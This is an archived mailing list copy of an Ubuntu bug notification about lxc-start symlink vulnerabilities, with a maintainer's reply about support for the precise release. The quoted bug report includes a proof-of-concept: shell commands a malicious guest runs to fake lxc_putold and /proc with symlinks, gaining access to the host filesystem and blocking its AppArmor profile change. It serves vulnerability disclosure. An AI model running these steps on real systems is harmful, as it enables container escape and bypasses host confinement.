touch-packages team mailing list archive

Thread
Date

[Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor

To: touch-packages@xxxxxxxxxxxxxxxxxxx
From: Stéphane Graber <stgraber@xxxxxxxxxxxx>
Date: Tue, 29 Sep 2015 22:04:08 -0000
Reply-to: Bug 1476662 <1476662@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

Chances are it is, but lxc in precise is in universe and on an unsupported upstream release, so we're not doing security updates there.
You can however use the upstream LXC PPA which will get you trusty's LXC on precise, including this security fix.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1476662

Title:
  lxc-start symlink vulnerabilities may allow guest to read host
  filesystem, interfere with apparmor

Status in lxc package in Ubuntu:
  Fix Released

Bug description:
  lxc-start shuffles around mounts using helper directory
  /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here)

  It then modifies mounts operating in guest root directory before
  invoking init. As it does not check if all mount points are
  directories, a malicious guest may modify its internal structure
  before shutdown (or was created using manipulated image) and then when
  started again, guest may

  * Access  the whole host root filesystem

  * Block switching from lxc-start apparmor profile to lxc-container-
  default

  
  # Real putold before pivot-root (root fs will end here)
  mkdir -p /x/lxc_putold

  # Faked putold
  ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold
  mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc
  touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts

  
  # proc fake
  mkdir -p /x/proc
  umount /proc
  rmdir /proc
  ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc

  mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self
  touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current
  touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status


  The  issue was also found during
  https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions